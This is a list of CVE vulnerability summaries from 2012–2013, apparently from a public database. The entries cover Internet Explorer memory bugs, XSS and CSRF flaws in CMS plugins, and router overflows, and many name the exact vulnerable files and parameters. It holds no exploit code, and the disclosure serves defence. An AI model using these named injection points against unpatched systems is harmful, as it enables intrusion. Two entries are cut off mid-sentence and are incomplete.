[CVE-2013-0087] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer OnResize Use After Free Vulnerability."
[CVE-2013-0083] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via crafted content, leading to administrative command execution, aka "SharePoint XSS Vulnerability."
[CVE-2013-0030] The Vector Markup Language (VML) implementation in Microsoft Internet Explorer 6 through 10 does not properly allocate buffers, which allows remote attackers to execute arbitrary code via a crafted web site, aka "VML Memory Corruption Vulnerability."
[CVE-2013-0029] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CHTML Use After Free Vulnerability."
[CVE-2013-0028] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CObjectElement Use After Free Vulnerability."
[CVE-2013-0027] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CPasteCommand Use After Free Vulnerability."
[CVE-2013-0026] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer InsertElement Use After Free Vulnerability."
[CVE-2013-0025] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer SLayoutRun Use After Free Vulnerability."
[CVE-2013-0024] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer pasteHTML Use After Free Vulnerability."
[CVE-2013-0023] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CDispNode Use After Free Vulnerability."
[CVE-2013-0022] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."
[CVE-2013-0021] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer vtable Use After Free Vulnerability."
[CVE-2013-0020] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CMarkup Use After Free Vulnerability."
[CVE-2013-0019] Use-after-free vulnerability in Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer COmWindowProxy Use After Free Vulnerability."
[CVE-2013-0018] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer SetCapture Use After Free Vulnerability."
[CVE-2013-0015] Microsoft Internet Explorer 6 through 9 does not properly perform auto-selection of the Shift JIS encoding, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site that triggers cross-domain scrolling events, aka "Shift JIS Character Encoding Vulnerability."
[CVE-2013-0010] Cross-site scripting (XSS) vulnerability in Microsoft System Center Operations Manager 2007 SP1 and R2 allows remote attackers to inject arbitrary web script or HTML via crafted input, aka "System Center Operations Manager Web Console XSS Vulnerability," a different vulnerability than CVE-2013-0009.
[CVE-2013-0009] Cross-site scripting (XSS) vulnerability in Microsoft System Center Operations Manager 2007 SP1 and R2 allows remote attackers to inject arbitrary web script or HTML via crafted input, aka "System Center Operations Manager Web Console XSS Vulnerability," a different vulnerability than CVE-2013-0010.
[CVE-2013-0007] Microsoft XML Core Services (aka MSXML) 4.0, 5.0, and 6.0 does not properly parse XML content, which allows remote attackers to execute arbitrary code via a crafted web page, aka "MSXML XSLT Vulnerability."
[CVE-2013-0006] Microsoft XML Core Services (aka MSXML) 3.0, 5.0, and 6.0 does not properly parse XML content, which allows remote attackers to execute arbitrary code via a crafted web page, aka "MSXML Integer Truncation Vulnerability."
[CVE-2012-6576] Cross-site scripting (XSS) vulnerability in the PRH Search module 7.x-1.x before 7.x-1.1 for Drupal allows remote attackers from certain sources to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-6575] Cross-site scripting (XSS) vulnerability in the Exposed Filter Data module 6.x-1.x before 6.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-6574] Cross-site scripting (XSS) vulnerability in the Fonecta verify module 7.x-1.x before 7.x-1.6 for Drupal allows remote attackers from certain sources to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
[CVE-2012-6572] Cross-site scripting (XSS) vulnerability in the phptemplate_preprocess_node function in template.php in the Inf08 theme 6.x-1.x before 6.x-1.10 for Drupal allows remote authenticated users with the "administer taxonomy" permission to inject arbitrary web script or HTML via a taxonomy vocabulary name.
[CVE-2012-6571] The HTTP module in the (1) Branch Intelligent Management System (BIMS) and (2) web management components on Huawei AR routers and S2000, S3000, S3500, S3900, S5100, S5600, and S7800 switches uses predictable Session ID values, which makes it easier for remote attackers to hijack sessions via a brute-force attack.
[CVE-2012-6570] The HTTP module in the (1) Branch Intelligent Management System (BIMS) and (2) web management components on Huawei AR routers and S2000, S3000, S3500, S3900, S5100, S5600, S7800, and S8500 switches does not check whether HTTP data is longer than the value of the Content-Length field, which allows remote HTTP servers to conduct heap-based buffer overflow attacks and execute arbitrary code via a crafted response.
[CVE-2012-6569] Stack-based buffer overflow in the HTTP module in the (1) Branch Intelligent Management System (BIMS) and (2) web management components on Huawei AR routers and S2000, S3000, S3500, S3900, S5100, S5600, S7800, and S8500 switches allows remote attackers to execute arbitrary code via a long URI.
[CVE-2012-6566] Cross-site scripting (XSS) vulnerability in REDCap before 4.14.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-6565] Cross-site scripting (XSS) vulnerability in REDCap before 4.14.3 allows remote authenticated users to inject arbitrary web script or HTML via uppercase characters in JavaScript events within user-defined labels.
[CVE-2012-6564] Cross-site scripting (XSS) vulnerability in REDCap before 4.14.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-6561] Cross-site scripting (XSS) vulnerability in engine/lib/views.php in Elgg before 1.8.5 allows remote attackers to inject arbitrary web script or HTML via the view parameter to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2012-6559] Multiple cross-site scripting (XSS) vulnerabilities in FreeNAC 3.02 allow remote attackers to inject arbitrary web script or HTML via the (1) comment, (2) mac, (3) graphtype, (4) name, or (5) type parameter to stats.php.
[CVE-2012-6557] Multiple cross-site scripting (XSS) vulnerabilities in the AboutMe plugin 1.1.1 for Vanilla Forums allow remote attackers to inject arbitrary web script or HTML via the (1) AboutMe/RealName, (2) AboutMe/Name, (3) AboutMe/Quote, (4) AboutMe/Loc, (5) AboutMe/Emp, (6) AboutMe/JobTit, (7) AboutMe/HS, (8) AboutMe/Col, (9) AboutMe/Bio, (10) AboutMe/Inter, (11) AboutMe/Mus, (12) AboutMe/Gam, (13) AboutMe/Mov, (14) AboutMe/FTV, or (15) AboutMe/Bks parameter to the Edit My Details page. NOTE: some of these details are obtained from third party information.
[CVE-2012-6556] Multiple cross-site scripting (XSS) vulnerabilities in the FirstLastNames plugin 1.1.1 for Vanilla Forums allow remote attackers to inject arbitrary web script or HTML via the (1) User/FirstName or (2) User/LastName parameter to the edit user page. NOTE: some of these details are obtained from third party information.
[CVE-2012-6555] Cross-site scripting (XSS) vulnerability in the LatestComment plugin 1.1 for Vanilla Forums allows remote attackers to inject arbitrary web script or HTML via the discussion title.
[CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
[CVE-2012-6550] Cross-site scripting (XSS) vulnerability in ZeroClipboard before 1.1.4 allows remote attackers to inject arbitrary web script or HTML via "the clipText returned from the flash object," a different vulnerability than CVE-2013-1808.
[CVE-2012-6528] Multiple cross-site scripting (XSS) vulnerabilities in ATutor before 2.1 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) themes/default/tile_search/index.tmpl.php, (2) login.php, (3) search.php, (4) password_reminder.php, (5) login.php/jscripts/infusion, (6) login.php/mods/_standard/flowplayer, (7) browse.php/jscripts/infusion/framework/fss, (8) registration.php/themes/default/ie_styles.css, (9) about.php, or (10) themes/default/social/basic_profile.tmpl.php.
[CVE-2012-6527] Cross-site scripting (XSS) vulnerability in the My Calendar plugin before 1.10.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2012-6523] Multiple cross-site scripting (XSS) vulnerabilities in w-CMS 2.01 allow remote attackers to inject arbitrary web script or HTML via (1) the p parameter in the getMenus function in codes/wcms.php
[CVE-2012-6521] Cross-site scripting (XSS) vulnerability in apps/admin/handlers/versions.php in Elefant CMS 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter to admin/versions.
[CVE-2012-6517] Multiple cross-site scripting (XSS) vulnerabilities in DiY-CMS 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) question parameter to /modules/poll/add.php or the (2) question or (3) answer parameter to modules/poll/edit.php.
[CVE-2012-6514] Cross-site scripting (XSS) vulnerability in the nBill (com_netinvoice) component 2.3.2 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the message parameter in an income action to administrator/index.php.
[CVE-2012-6513] Cross-site scripting (XSS) vulnerability in index.php/Admin_Preferences in gpEasy CMS 2.3.3 allows remote attackers to inject arbitrary web script or HTML via the jsoncallback parameter.
[CVE-2012-6511] Multiple cross-site scripting (XSS) vulnerabilities in organizer/page/users.php in the Organizer plugin 1.2.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) delete_id parameter or (2) extension parameter in an "Update Setting" action to wp-admin/admin.php.
[CVE-2012-6510] Multiple cross-site scripting (XSS) vulnerabilities in NetArt Media Car Portal 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) PWRS or (2) Description field when posting a new vehicle.
[CVE-2012-6506] Multiple cross-site scripting (XSS) vulnerabilities in the Zingiri Web Shop plugin 2.4.0 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter in zing.inc.php or (2) notes parameter in fws/pages-front/onecheckout.php.
[CVE-2012-6505] Cross-site scripting (XSS) vulnerability in mods/hours/data/get_hours.php in PHP Volunteer Management 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2012-6499] Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.
[CVE-2012-6469] Opera before 12.11 allows remote attackers to determine the existence of arbitrary local files via vectors involving web script in an error page.
[CVE-2012-6467] Opera before 12.10 follows Internet shortcuts that are referenced by a (1) IMG element or (2) other inline element, which makes it easier for remote attackers to conduct phishing attacks via a crafted web site, as exploited in the wild in November 2012.
[CVE-2012-6466] Opera before 12.10 does not properly handle incorrect size data in a WebP image, which allows remote attackers to obtain potentially sensitive information from process memory by using a crafted image as the fill pattern for a canvas.
[CVE-2012-6464] Cross-site scripting (XSS) vulnerability in Opera before 12.10 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript code that overrides methods of unspecified native objects in documents that have different origins.
[CVE-2012-6463] Cross-site scripting (XSS) vulnerability in Opera before 12.10 allows remote attackers to inject arbitrary web script or HTML via vectors involving an unspecified sequence of loading of documents and loading of data: URLs.
[CVE-2012-6460] Opera before 11.67 and 12.x before 12.02 allows remote attackers to cause truncation of a dialog, and possibly trigger downloading and execution of arbitrary programs, via a crafted web site.
[CVE-2012-6458] Multiple cross-site scripting (XSS) vulnerabilities in the SilverStripe e-commerce module 3.0 for SilverStripe CMS allow remote attackers to inject arbitrary web script or HTML via the (1) FirstName, (2) Surname, or (3) Email parameter to code/forms/OrderFormAddress.php.
[CVE-2012-6453] Cross-site scripting (XSS) vulnerability in the RSS Reader extension before 0.2.6 for MediaWiki allows remote attackers to inject arbitrary web script or HTML via a crafted feed.
[CVE-2012-6440] The web-server password-authentication functionality in Rockwell Automation EtherNet/IP products
[CVE-2012-6434] Multiple cross-site request forgery (CSRF) vulnerabilities in e107_admin/download.php in e107 1.0.2 allow remote attackers to hijack the authentication of administrators for requests that conduct SQL injection attacks via the (1) download_url, (2) download_url_extended, (3) download_author_email, (4) download_author_website, (5) download_image, (6) download_thumb, (7) download_visible, or (8) download_class parameter.
[CVE-2012-6399] Cisco WebEx 4.1 on iOS does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate, aka Bug ID CSCud94176.
[CVE-2012-6397] Cross-site scripting (XSS) vulnerability in Cisco WebEx Social (formerly Cisco Quad) allows remote attackers to inject arbitrary web script or HTML via a crafted RSS service link, aka Bug ID CSCub61977.
[CVE-2012-6396] Cisco NX-OS on Nexus 7000 series switches does not properly handle certain line-card replacements, which might allow remote authenticated users to cause a denial of service (memory consumption) via a crafted configuration that references interfaces that do not exist on the new card, aka Bug ID CSCud44300.
[CVE-2012-6369] Cross-site scripting (XSS) vulnerability in the Troubleshooting Reporting System feature in AgileBits 1Password 3.9.9 might allow remote attackers to inject arbitrary web script or HTML via a crafted User-Agent HTTP header that is not properly handled in a View Troubleshooting Report action.
[CVE-2012-6360] Cross-site scripting (XSS) vulnerability in IBM Intelligent Operations Center 1.5.0 allows remote attackers to inject arbitrary web script or HTML via event data fields.
[CVE-2012-6350] Cross-site scripting (XSS) vulnerability in the Web component in IBM Cognos TM1 before 9.5.2 FP3 and 10.1 before 10.1 FP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-6312] Cross-site scripting (XSS) vulnerability in the Video Lead Form plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via the errMsg parameter in a video-lead-form action to wp-admin/admin.php.
[CVE-2012-6272] Multiple cross-site scripting (XSS) vulnerabilities in Dell OpenManage Server Administrator 6.5.0.1, 7.0.0.1, and 7.1.0.1 allow remote attackers to inject arbitrary web script or HTML via the topic parameter to html/index_main.htm in (1) help/sm/en/Output/wwhelp/wwhimpl/js/, (2) help/sm/es/Output/wwhelp/wwhimpl/js/, (3) help/sm/ja/Output/wwhelp/wwhimpl/js/, (4) help/sm/de/Output/wwhelp/wwhimpl/js/, (5) help/sm/fr/Output/wwhelp/wwhimpl/js/, (6) help/sm/zh/Output/wwhelp/wwhimpl/js/, (7) help/hip/en/msgguide/wwhelp/wwhimpl/js/, or (8) help/hip/en/msgguide/wwhelp/wwhimpl/common/.
[CVE-2012-6148] Cross-site scripting (XSS) vulnerability in the function menu API in TYPO3 4.5.x before 4.5.21, 4.6.x before 4.6.14, and 4.7.x before 4.7.6 allows remote authenticated backend users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-6147] Cross-site scripting (XSS) vulnerability in the tree render API (TCA-Tree) in the Backend API in TYPO3 4.5.x before 4.5.21, 4.6.x before 4.6.14, and 4.7.x before 4.7.6 allows remote authenticated backend users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-6145] Cross-site scripting (XSS) vulnerability in the Backend History module in TYPO3 4.5.x before 4.5.21, 4.6.x before 4.6.14, and 4.7.x before 4.7.6 allows remote authenticated backend users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-6121] Cross-site scripting (XSS) vulnerability in Roundcube Webmail before 0.8.5 allows remote attackers to inject arbitrary web script or HTML via a (1) data:text or (2) vbscript link.
[CVE-2012-6101] Multiple open redirect vulnerabilities in Moodle 2.2.x before 2.2.7, 2.3.x before 2.3.4, and 2.4.x before 2.4.1 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via vectors related to (1) backup/backupfilesedit.php, (2) comment/comment_post.php, (3) course/switchrole.php, (4) mod/wiki/filesedit.php, (5) tag/coursetags_add.php, or (6) user/files.php.
[CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
[CVE-2012-6082] Cross-site scripting (XSS) vulnerability in the rsslink function in theme/__init__.py in MoinMoin 1.9.5 allows remote attackers to inject arbitrary web script or HTML via the page name in a rss link.
[CVE-2012-6074] Cross-site scripting (XSS) vulnerability in CloudBees Jenkins before 1.491, Jenkins LTS before 1.480.1, and Jenkins Enterprise 1.424.x before 1.424.6.13, 1.447.x before 1.447.4.1, and 1.466.x before 1.466.10.1 allows remote authenticated users with write access to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-6073] Open redirect vulnerability in CloudBees Jenkins before 1.491, Jenkins LTS before 1.480.1, and Jenkins Enterprise 1.424.x before 1.424.6.13, 1.447.x before 1.447.4.1, and 1.466.x before 1.466.10.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2012-6068] The Runtime Toolkit in CODESYS Runtime System 2.3.x and 2.4.x does not require authentication, which allows remote attackers to (1) execute commands via the command-line interface in the TCP listener service or (2) transfer files via requests to the TCP listener service.
[CVE-2012-6045] Cross-site scripting (XSS) vulnerability in gb/user/index.php in Ramui Forum, possibly 1.0 Beta, allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2012-6043] Cross-site scripting (XSS) vulnerability in downloads.php in PHP-Fusion 7.02.04 allows remote attackers to inject arbitrary web script or HTML via the cat_id parameter.
[CVE-2012-6040] Cross-site scripting (XSS) vulnerability in users.php in File King Advanced File Management 1.4 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2012-6037] Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4, and other versions including 1.2, allow remote attackers to inject arbitrary web script or HTML via a CSV header with "unknown fields," which are not properly handled in error messages in the (1) bulk user, (2) group, and (3) group member upload capabilities. NOTE: this issue was originally part of CVE-2012-2243, but that ID was SPLIT due to different issues by different researchers.
[CVE-2012-6029] Multiple cross-site scripting (XSS) vulnerabilities in the web-authentication function on the Cisco NAC Appliance 4.9.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) cm or (2) uri parameters to (a) perfigo_weblogin.jsp, or the (3) cm, (4) provider, (5) session, (6) uri, (7) userip, or (8) username parameters to (b) perfigo_cm_validate.jsp, aka Bug ID CSCud15109.
[CVE-2012-6007] Cross-site scripting (XSS) vulnerability in screens/base/web_auth_custom.html on Cisco Wireless LAN Controller (WLC) devices with software 7.2.110.0 allows remote authenticated users to inject arbitrary web script or HTML via the headline parameter, aka Bug ID CSCud65187, a different vulnerability than CVE-2012-5992.
[CVE-2012-5992] Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Wireless LAN Controller (WLC) devices with software 7.2.110.0 allow remote attackers to hijack the authentication of administrators for requests that (1) add administrative accounts via screens/aaa/mgmtuser_create.html or (2) insert XSS sequences via the headline parameter to screens/base/web_auth_custom.html, aka Bug ID CSCud50283.
[CVE-2012-5991] screens/base/web_auth_custom.html on Cisco Wireless LAN Controller (WLC) devices with software 7.2.110.0 allows remote authenticated users to cause a denial of service (device reload) via a certain buttonClicked value in an internal webauth_type request, aka Bug ID CSCud50209.
[CVE-2012-5972] Directory traversal vulnerability in the web server in SpecView 2.5 build 853 and earlier allows remote attackers to read arbitrary files via a ... (dot dot dot) in a URI.
[CVE-2012-5956] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine AssetExplorer 5.6 before service pack 5614 allow remote attackers to inject arbitrary web script or HTML via fields in XML asset data to discoveryServlet/WsDiscoveryServlet, as demonstrated by the DocRoot/Computer_Information/output element.
[CVE-2012-5955] Unspecified vulnerability in the IBM HTTP Server component 5.3 in IBM WebSphere Application Server (WAS) for z/OS allows remote attackers to execute arbitrary commands via unknown vectors.
[CVE-2012-5953] IBM WebSphere Message Broker 6.1 before 6.1.0.12, 7.0 before 7.0.0.6, and 8.0 before 8.0.0.2, when the Parse Query Strings option is enabled on an HTTPInput node, allows remote attackers to cause a denial of service (infinite loop) via a crafted query string.
[CVE-2012-5952] IBM WebSphere Message Broker 6.1 before 6.1.0.12, 7.0 before 7.0.0.6, and 8.0 before 8.0.0.2 does not validate Basic Authentication credentials before proceeding to WS-Addressing and WS-Security operations, which allows remote attackers to trigger transmission of unauthenticated messages via unspecified vectors.
[CVE-2012-5949] Multiple cross-site scripting (XSS) vulnerabilities in IBM TRIRIGA Application Platform 2.x and 3.x before 3.3, and 8, allow remote attackers to inject content, and conduct phishing attacks, via vectors involving (1) the html/en/default/ directory, (2) birt/frameset, (3) WebProcess.srv, (4) sqa/html/en/default/reportTemplate/reportTemplateOrderCols.jsp, or (5) a/html/en/default/om2/omObjectFinder.jsp.
[CVE-2012-5948] Multiple cross-site scripting (XSS) vulnerabilities in IBM TRIRIGA Application Platform 2.x and 3.x before 3.3, and 8, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) WebProcess.srv, (2) the html/en/default/ directory, (3) Widget/resource, (4) birt/frameset, or (5) ganttlib/gantt-jws.jnlp.
[CVE-2012-5943] Cross-site scripting (XSS) vulnerability in IBM iNotes 8.5.x before 8.5.3 FP4 allows user-assisted remote attackers to inject arbitrary web script or HTML via vectors involving mail, aka SPR JDOE8ZZS9.
[CVE-2012-5941] Cross-site scripting (XSS) vulnerability in the WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza allows remote authenticated users to inject content, and conduct phishing attacks, via unspecified vectors.
[CVE-2012-5940] The WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza, when SSL is not enabled, allows remote attackers to discover credentials by sniffing the network during the authentication process.
[CVE-2012-5920] Cross-site scripting (XSS) vulnerability in Google Web Toolkit (GWT) 2.4 through 2.5 Final, as used in JBoss Operations Network (ON) 3.1.1 and possibly other products, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this issue exists because of an incomplete fix for CVE-2012-4563.
[CVE-2012-5919] Multiple cross-site scripting (XSS) vulnerabilities in Havalite 1.0.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) find or (2) replace fields to havalite/findReplace.php.
[CVE-2012-5914] Multiple cross-site scripting (XSS) vulnerabilities in the sed_import function in system/functions.php in Neocrome Seditio build 160 and 161 allow remote attackers to inject arbitrary web script or HTML via the (1) newmsg or (2) rtext parameter. NOTE: some of these details are obtained from third party information.
[CVE-2012-5913] Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
[CVE-2012-5911] Cross-site scripting (XSS) vulnerability in blogs/blog1.php in b2evolution 4.1.3 allows remote attackers to inject arbitrary web script or HTML via the message body.
[CVE-2012-5908] Cross-site scripting (XSS) vulnerability in admin/modules/user/users.php in MyBB (aka MyBulletinBoard) 1.6.6 allows remote attackers to inject arbitrary web script or HTML via the conditions[usergroup][] parameter in a search action to admin/index.php.
[CVE-2012-5906] Multiple cross-site scripting (XSS) vulnerabilities in GreenBrowser 6.1.0117 and 6.1.0216 allow remote attackers to inject arbitrary web script or HTML via (1) the URI in an about: page or (2) the last visited URL in the LastVisitWriteEn function in function.js.
[CVE-2012-5903] Cross-site scripting (XSS) vulnerability in Simple Machines Forum (SMF) 2.0.2 allows remote attackers to inject arbitrary web script or HTML via the scheduled parameter to index.php.
[CVE-2012-5902] Cross-site scripting (XSS) vulnerability in ptk/lib/modal_bookmark.php in DFLabs PTK 1.0.5 allows remote attackers to inject arbitrary web script or HTML via the arg4 parameter.
[CVE-2012-5901] DFLabs PTK 1.0.5 stores data files with predictable names under the web document root with insufficient access control, which allows remote attackers to read logs, images, or reports via a direct request to the file in the (1) log, (2) images, or (3) report directory.
[CVE-2012-5899] Cross-site scripting (XSS) vulnerability in admin/action/objects.php in SAMEDIA LandShop 0.9.2 allows remote attackers to inject arbitrary web script or HTML via the OTR_HEADS[] parameter in an edit action. NOTE: some of these details are obtained from third party information.
[CVE-2012-5892] Havalite CMS 1.1.0 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the configuration database via a direct request for data/havalite.db3.
[CVE-2012-5889] Cross-site scripting (XSS) vulnerability in the powermail extension before 1.6.5 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5888] Cross-site scripting (XSS) vulnerability in Basic SEO Features (seo_basics) extension before 0.8.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5884] The User.get method in Bugzilla/WebService/User.pm in Bugzilla 4.3.2 allows remote attackers to obtain sensitive information about the saved searches of arbitrary users via an XMLRPC request or a JSONRPC request, a different vulnerability than CVE-2012-4198.
[CVE-2012-5883] Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.8.0 through 2.9.0, as used in Bugzilla 3.7.x and 4.0.x before 4.0.9, 4.1.x and 4.2.x before 4.2.4, and 4.3.x and 4.4.x before 4.4rc1, allows remote attackers to inject arbitrary web script or HTML via vectors related to swfstore.swf, a similar issue to CVE-2010-4209.
[CVE-2012-5882] Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.5.0 through 2.9.0 allows remote attackers to inject arbitrary web script or HTML via vectors related to uploader.swf, a similar issue to CVE-2010-4208.
[CVE-2012-5881] Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.4.0 through 2.9.0 allows remote attackers to inject arbitrary web script or HTML via vectors related to charts.swf, a similar issue to CVE-2010-4207.
[CVE-2012-5864] The management web pages on the Sinapsi eSolar Light Photovoltaic System Monitor (aka Schneider Electric Ezylog photovoltaic SCADA management server), Sinapsi eSolar, and Sinapsi eSolar DUO with firmware before 2.0.2870_2.2.12 do not require authentication, which allows remote attackers to obtain administrative access via a direct request, as demonstrated by a request to ping.php.
[CVE-2012-5856] Cross-site scripting (XSS) vulnerability in the Uk Cookie (aka uk-cookie) plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5851] html/parser/XSSAuditor.cpp in WebCore in WebKit, as used in Google Chrome through 22 and Safari 5.1.7, does not consider all possible output contexts of reflected data, which makes it easier for remote attackers to bypass a cross-site scripting (XSS) protection mechanism via a crafted string, aka rdar problem 12019108.
[CVE-2012-5841] Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, Thunderbird before 17.0, Thunderbird ESR 10.x before 10.0.11, and SeaMonkey before 2.14 implement cross-origin wrappers with a filtering behavior that does not properly restrict write actions, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site.
[CVE-2012-5838] The copyTexImage2D implementation in the WebGL subsystem in Mozilla Firefox before 17.0, Thunderbird before 17.0, and SeaMonkey before 2.14 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via large image dimensions.
[CVE-2012-5837] The Web Developer Toolbar in Mozilla Firefox before 17.0 executes script with chrome privileges, which allows user-assisted remote attackers to conduct cross-site scripting (XSS) attacks via a crafted string.
[CVE-2012-5835] Integer overflow in the WebGL subsystem in Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, Thunderbird before 17.0, Thunderbird ESR 10.x before 10.0.11, and SeaMonkey before 2.14 allows remote attackers to execute arbitrary code or cause a denial of service (invalid write operation) via crafted data.
[CVE-2012-5833] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, Thunderbird before 17.0, Thunderbird ESR 10.x before 10.0.11, and SeaMonkey before 2.14 does not properly interact with Mesa drivers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via function calls involving certain values of the level parameter.
[CVE-2012-5814] Weberknecht, as used in GitHub Gaug.es and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
[CVE-2012-5765] The Web Client (aka CQ Web) in IBM Rational ClearQuest 7.1.2.x before 7.1.2.9 and 8.0.0.x before 8.0.0.5 allows remote attackers to obtain sensitive information via unspecified vectors that trigger a SQL error message.
[CVE-2012-5763] Cross-site request forgery (CSRF) vulnerability in the WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
[CVE-2012-5762] Cross-site scripting (XSS) vulnerability in the WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza allows remote authenticated users to inject arbitrary web script or HTML via vectors involving the MHTML protocol.
[CVE-2012-5761] Cross-site scripting (XSS) vulnerability in the WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5760] SQL injection vulnerability in the WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors.
